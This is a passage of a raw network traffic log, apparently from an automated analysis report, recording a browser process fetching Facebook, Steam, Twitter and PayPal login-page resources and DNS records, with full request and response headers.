cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
content-md5: D0uv4+wDDRf1er6XhWyW9g==
x-fb-debug: jDEDzZb+cs6cLu4hHML3XgkYg6uewYVjSBeooFAkdHUFETT/6Y8RvDZH/2/POMCmcIv35AH9da686s5RIHvDOg==
content-length: 4178
date: Fri, 03 Nov 2023 04:50:20 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yP/r/PBxn1dUtKfr.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yP/r/PBxn1dUtKfr.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 01 Nov 2024 18:05:53 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: FctHIR+QjT30BD4Fa7a2/A==
x-fb-debug: pMi0uVsLK+t6SJoTuI9m50UCt3HJD8XuuSNv0LP6+7Om8L7iS7T8idXQaXinxwQf/mYeICiy/EFWGyu+VMi92w==
content-length: 1135
date: Fri, 03 Nov 2023 04:50:20 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3iJfX4/yf/l/en_US/6WRGdheESMG.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3iJfX4/yf/l/en_US/6WRGdheESMG.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Wed, 30 Oct 2024 16:21:02 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: a+ZYbd9aZlC5LXBP1c1www==
x-fb-debug: bfGLXvex6AmkthSV8hDpeaqPvJPhupLwRhtzeY1cYae9IEaPwbPrC+nVL1/29z32pqBSmHBNmaj/VfEbOL61vQ==
content-length: 10810
date: Fri, 03 Nov 2023 04:50:20 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yF/r/tYrcK3yvAV5.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yF/r/tYrcK3yvAV5.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 01 Nov 2024 18:05:53 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: ZluDcMlMb17gY4Sj21TomQ==
x-fb-debug: ojEDkOKY6B3RR+kuhheQC3WSigtebXzPkPCQ9b8XeVxrZ2zFfdd+N4/t7cfjNivtNdCi/s1mTFo17bNcSiVFfw==
content-length: 6637
date: Fri, 03 Nov 2023 04:50:20 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3iPwL4/y-/l/en_US/E8TJEGTDAyl.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3iPwL4/y-/l/en_US/E8TJEGTDAyl.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Wed, 30 Oct 2024 16:21:02 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: kPaCIDIwkUcB5XUBxE1EEA==
x-fb-debug: cpoUDbhl+9tanlhuA6sMrdenD6+YhC0bv7FdfqSMB44TZxeYGl3rcWmlP9f0efOMBoK5WOYfuQhFtgjYUL1zMw==
content-length: 13428
date: Fri, 03 Nov 2023 04:50:20 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3iLl54/y4/l/en_US/LBpPFPyKYli.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3iLl54/y4/l/en_US/LBpPFPyKYli.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 31 Oct 2024 18:41:52 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
content-md5: RFwdiPdm871pzGVKX/NLzA==
x-fb-debug: k76W9GuN7nB2Uu/3DY6+XgeRwXqSlHrDo4SIUue7nmCVjQ2tc7Ca5Br8mZE4P/NVAnmZ5ULVeKqTnDoGuU0KTw==
content-length: 1206
date: Fri, 03 Nov 2023 04:50:20 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yD/r/Z48vtSCIBTI.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yD/r/Z48vtSCIBTI.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Thu, 31 Oct 2024 19:08:51 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: gv6G5TaBUuJSmDhb7+fSMg==
x-fb-debug: 6ND4/jjTHK5rroapDg62QUeqxW7kt4uo+hk8SOLVQlrxqzNFU1RCgtRC7fFiq4CKI7XC1t2Bo5tDDi4rYPMowA==
content-length: 7085
date: Fri, 03 Nov 2023 04:50:20 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yh/r/9mphvTNT6fR.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yh/r/9mphvTNT6fR.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 01 Nov 2024 18:05:53 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: r64k0oLcbsKBQZzZG8THXQ==
x-fb-debug: IPGdrIwMvPirqbwbIQOKjmtqx38LytY9nyflSKQh1nIysbLpEjgXsSqpQ/zFHUMRWTb25eZa9m1lmYT8Q40xfw==
content-length: 55280
date: Fri, 03 Nov 2023 04:50:20 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yk/r/82PAamYR-V3.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yk/r/82PAamYR-V3.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Tue, 29 Oct 2024 15:44:38 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: XkiCzrf22rxXd5vH1mmy8Q==
x-fb-debug: dsKLeWaYbX+CcSxLyLL0eN9DobJPd1/5wFUsp4hV9B33y4fefHsLgAuw+8wEaxQe2fkPITrMTNEFnaqZulVi0w==
content-length: 1207
date: Fri, 03 Nov 2023 04:50:20 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/y-/r/2hIp7nUDJvm.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/y-/r/2hIp7nUDJvm.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Tue, 29 Oct 2024 15:43:52 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: O7ZBfznX0G2ti2qHqp55lw==
x-fb-debug: asz2RYDdTEQdZ51x2yWUmky049/P+tOMIzyb/tVgf0fLDuHzF23W8kMAmmUFeM8J1QLFIvQod4MZvRgwb+dhqQ==
content-length: 415
date: Fri, 03 Nov 2023 04:50:20 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3ihVQ4/yy/l/en_US/A-PnZzh3UJl.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3ihVQ4/yy/l/en_US/A-PnZzh3UJl.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Sat, 02 Nov 2024 00:13:36 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: RykvDEMFr4bzoU7d5zjTDg==
x-fb-debug: Af1xri99MuohmCtzZEoCWNr6/etOuWyHWeTdmicsOz7qwgazL2rRWs8eNyC9mYH+ou3fFWVz1xFPqP+hAOSyjg==
content-length: 14514
date: Fri, 03 Nov 2023 04:50:20 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yI/r/C3CnmLDYuAn.js?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yI/r/C3CnmLDYuAn.js?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: application/javascript, */*;q=0.8
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: application/x-javascript; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 01 Nov 2024 09:04:29 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: kor8Z17k9IvBwEdlwWYwPQ==
x-fb-debug: 5CvfEVtdKIMkeelQt/gj75eI6F3sDtqbBpKCcPnuK3vcyGkySH04cvsK1vkGeBbWDYYT3DWjBVXqZ79IaKuN2Q==
content-length: 1078
date: Fri, 03 Nov 2023 04:50:20 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yB/r/Y0L6f5sxdIV.png

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yB/r/Y0L6f5sxdIV.png HTTP/2.0
host: static.xx.fbcdn.net
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
content-md5: hFRfTj3CmfIMC+ZxDLCYWA==
expires: Sat, 19 Oct 2024 05:19:02 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
x-fb-debug: 2emZ45jJ5YAVhoHviEoeIXgV+6EX4g2JoRrICUoK3Rz+HTXJ4gkqwJwaRMzxu2OsDKSvZmhSGPNukRT1dm50sw==
content-length: 6739
date: Fri, 03 Nov 2023 04:50:39 GMT
alt-svc: h3=":443"; ma=86400
DNS

www.paypal.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

www.paypal.com

IN A

Response

www.paypal.com

IN CNAME

www.glb.paypal.com

www.glb.paypal.com

IN CNAME

paypal-dynamic.map.fastly.net

paypal-dynamic.map.fastly.net

IN A

151.101.1.21

paypal-dynamic.map.fastly.net

IN A

151.101.65.21

paypal-dynamic.map.fastly.net

IN A

151.101.129.21

paypal-dynamic.map.fastly.net

IN A

151.101.193.21
DNS

129.42.244.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

129.42.244.104.in-addr.arpa

IN PTR

Response
DNS

101.0.85.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

101.0.85.104.in-addr.arpa

IN PTR

Response

101.0.85.104.in-addr.arpa

IN PTR

a104-85-0-101deploystaticakamaitechnologiescom
DNS

10.5.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

10.5.240.157.in-addr.arpa

IN PTR

Response

10.5.240.157.in-addr.arpa

IN PTR

xx-fbcdn-shv-01-mad2fbcdnnet
GET

https://steamcommunity.com/openid/loginform/

MicrosoftEdgeCP.exe

Remote address:

23.207.106.113:443

Request

GET /openid/loginform/ HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
Accept-Encoding: gzip, deflate, br
Host: steamcommunity.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: text/html; charset=UTF-8
X-Frame-Options: DENY
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060 https://steamcommunity.com/ https://steam.tv/; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/ https://help.steampowered.com/; frame-ancestors 'self' https://steamloopback.host ;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 9259
Date: Fri, 03 Nov 2023 04:49:49 GMT
Connection: keep-alive
Set-Cookie: sessionid=468244b38d2dc171bf065567; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=NL%7Cdf992469ad58783256e377c74f856554; Path=/; Secure; HttpOnly; SameSite=None
DNS

abs.twimg.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

abs.twimg.com

IN A

Response

abs.twimg.com

IN CNAME

cs510.wpc.edgecastcdn.net

cs510.wpc.edgecastcdn.net

IN A

152.199.21.141
GET

https://abs.twimg.com/errors/logo46x38.png

MicrosoftEdgeCP.exe

Remote address:

152.199.21.141:443

Request

GET /errors/logo46x38.png HTTP/2.0
host: abs.twimg.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://twitter.com/i/flow/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

accept-ranges: bytes
access-control-allow-origin: *
age: 28740116
content-type: image/png
date: Fri, 03 Nov 2023 04:49:49 GMT
etag: "7vm/v2DloVVWH9dCWPNBNA=="
expires: Sat, 02 Nov 2024 04:49:49 GMT
last-modified: Wed, 25 May 2022 20:43:56 GMT
server: ECAcc (ama/4884)
strict-transport-security: max-age=631138519
surrogate-key: twitter-assets
timing-allow-origin: https://twitter.com, https://mobile.twitter.com
x-cache: HIT
x-connection-hash: 2e040e750008c114da89f4533a7e4e754ebf4b509ddb5d4e76aa89ba44abe030
x-content-type-options: nosniff
x-response-time: 7
x-ton-expected-size: 1015
content-length: 1015
DNS

store.cloudflare.steamstatic.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

store.cloudflare.steamstatic.com

IN A

Response

store.cloudflare.steamstatic.com

IN A

104.18.42.105

store.cloudflare.steamstatic.com

IN A

172.64.145.151
DNS

facebook.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

facebook.com

IN A

Response

facebook.com

IN A

157.240.5.35
DNS

ocsp.rootca1.amazontrust.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

ocsp.rootca1.amazontrust.com

IN A

Response

ocsp.rootca1.amazontrust.com

IN A

18.65.41.80
GET

https://store.cloudflare.steamstatic.com/public/css/v6/browse.css?v=wWw5tW1y7nea&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/css/v6/browse.css?v=wWw5tW1y7nea&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:49 GMT
content-type: text/css;charset=UTF-8
content-length: 2722
cache-control: public,max-age=15552000
expires: Mon, 05 Feb 2024 22:09:40 GMT
etag: "wWw5tW1y7nea"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
strict-transport-security: max-age=300
x-cache: MISS
cf-cache-status: HIT
age: 2635808
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe2f3ec40b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=2C1Oh9QFVTyK&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/shared/css/motiva_sans.css?v=2C1Oh9QFVTyK&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:49 GMT
content-type: text/css;charset=UTF-8
content-length: 18064
cache-control: public,max-age=15552000
expires: Sun, 10 Mar 2024 22:40:09 GMT
etag: "9W9LHJeR779e"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
strict-transport-security: max-age=10368000
x-cache: MISS
cf-cache-status: HIT
age: 85697
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe2f3ec60b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=9W9LHJeR779e&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/shared/css/shared_global.css?v=9W9LHJeR779e&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:49 GMT
content-type: text/css;charset=UTF-8
content-length: 3533
cache-control: public,max-age=15552000
expires: Sun, 14 Jan 2024 06:24:46 GMT
etag: "hFJKQ6HV7IKT"
last-modified: Sun, 09 Sep 2001 01:46:40 GMT
content-encoding: gzip
strict-transport-security: max-age=300
x-cache: MISS
cf-cache-status: HIT
age: 2299742
accept-ranges: bytes
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201fe2f3ec70b4e-AMS
GET

https://store.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=hFJKQ6HV7IKT&l=english&_cdn=cloudflare

MicrosoftEdgeCP.exe

Remote address:

104.18.42.105:443

Request

GET /public/shared/css/buttons.css?v=hFJKQ6HV7IKT&l=english&_cdn=cloudflare HTTP/2.0
host: store.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://store.steampowered.com/login/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

